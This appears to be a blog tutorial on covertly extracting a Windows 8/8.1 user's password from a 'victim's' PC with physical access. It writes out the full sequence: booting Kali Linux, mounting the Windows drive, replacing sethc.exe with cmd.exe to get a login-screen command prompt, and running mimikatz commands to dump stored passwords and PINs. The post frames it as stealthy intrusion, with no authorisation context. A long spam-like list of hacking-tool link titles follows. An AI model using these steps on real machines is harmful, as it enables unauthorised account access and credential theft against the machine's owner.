Thursday, May 25, 2023

Cracking Windows 8/8.1 Passwords With Mimikatz



You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...


Requirements:


  1. A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
  2. Mimikatz (Download | Blog)
  3. Physical Access to victim's machine
  4. A Working Brain in that Big Head (Download Here)



Steps:

1. First of all download mimikatz and put it in a pendrive.

2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window

3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:

mkdir /media/win
ntfs-3g /dev/sda1 /media/win

[NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.

4. Now navigate to the System32 folder using the following command

cd /media/win/Windows/System32

5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:

mv sethc.exe sethc.exe.bak

sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.

6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:

cp cmd.exe sethc.exe

[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality

7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.

8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this





9. Now navigate to your usb drive in my case its drive G:




10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)


11. Run mimikatz and type the following commands one after the other in sequence:

privilege::debug
token::elevate
vault::list

the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)









That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...

Hope you enjoyed the tutorial have fun :)

Read more


  1. Pentest Tools Open Source
  2. Black Hat Hacker Tools
  3. Pentest Box Tools Download
  4. Pentest Tools
  5. Pentest Tools For Mac
  6. Hack Tools For Pc
  7. Hacking Tools For Windows 7
  8. Pentest Tools Port Scanner
  9. Pentest Tools For Ubuntu
  10. Hacker Tools
  11. Hacker Tools List
  12. Pentest Tools
  13. How To Install Pentest Tools In Ubuntu
  14. How To Hack
  15. How To Hack
  16. Black Hat Hacker Tools
  17. Pentest Tools Subdomain
  18. Hacker Tools Apk Download
  19. Hacks And Tools
  20. Pentest Tools Port Scanner
  21. Hacking Tools Mac
  22. Hacking Tools For Games
  23. Hacker Tools Online
  24. Black Hat Hacker Tools
  25. Pentest Tools For Mac
  26. Pentest Box Tools Download
  27. New Hack Tools
  28. Hack Tools For Games
  29. Hacking Tools For Pc
  30. Best Hacking Tools 2019
  31. Hack And Tools
  32. Hacking Apps
  33. Hacking Tools Windows 10
  34. Physical Pentest Tools
  35. Hack Rom Tools
  36. Android Hack Tools Github
  37. Pentest Reporting Tools
  38. Physical Pentest Tools
  39. Pentest Tools Subdomain
  40. Pentest Tools Bluekeep
  41. Pentest Tools Review
  42. Hacking Tools Usb
  43. Hack App
  44. Hacking Tools For Kali Linux
  45. Hackers Toolbox
  46. Pentest Automation Tools
  47. Tools Used For Hacking
  48. Nsa Hack Tools Download
  49. Hacks And Tools
  50. Hacker Tools List
  51. Black Hat Hacker Tools
  52. World No 1 Hacker Software
  53. Pentest Tools Tcp Port Scanner
  54. Hacking Apps
  55. Hacker Tools
  56. Hacker Search Tools
  57. Underground Hacker Sites
  58. Pentest Tools Nmap
  59. Hacking Tools For Pc
  60. Hacker Search Tools
  61. Hacker Tools Github
  62. Hacker Tools Windows
  63. Computer Hacker
  64. Pentest Tools
  65. Hacking Tools Online
  66. Hacker Tools
  67. Pentest Tools Bluekeep
  68. Hacker Security Tools
  69. Pentest Tools Nmap
  70. Hacking Tools Online
  71. Nsa Hack Tools Download
  72. Free Pentest Tools For Windows
  73. Growth Hacker Tools
  74. Pentest Tools Nmap
  75. Best Hacking Tools 2020
  76. Pentest Tools Windows
  77. Hacker Techniques Tools And Incident Handling
  78. Hack Website Online Tool
  79. Hacking Tools For Beginners
  80. What Is Hacking Tools
  81. Ethical Hacker Tools
  82. Tools Used For Hacking
  83. Hacker Techniques Tools And Incident Handling
  84. Computer Hacker
  85. Hack Tools 2019
  86. Hacking Tools For Pc
  87. Android Hack Tools Github
  88. Hack Tools Github
  89. Hacking Tools Hardware
  90. Hacking Tools Software
  91. Hack Apps
  92. Hacks And Tools
  93. Best Hacking Tools 2019
  94. Pentest Tools Apk

No comments:

Post a Comment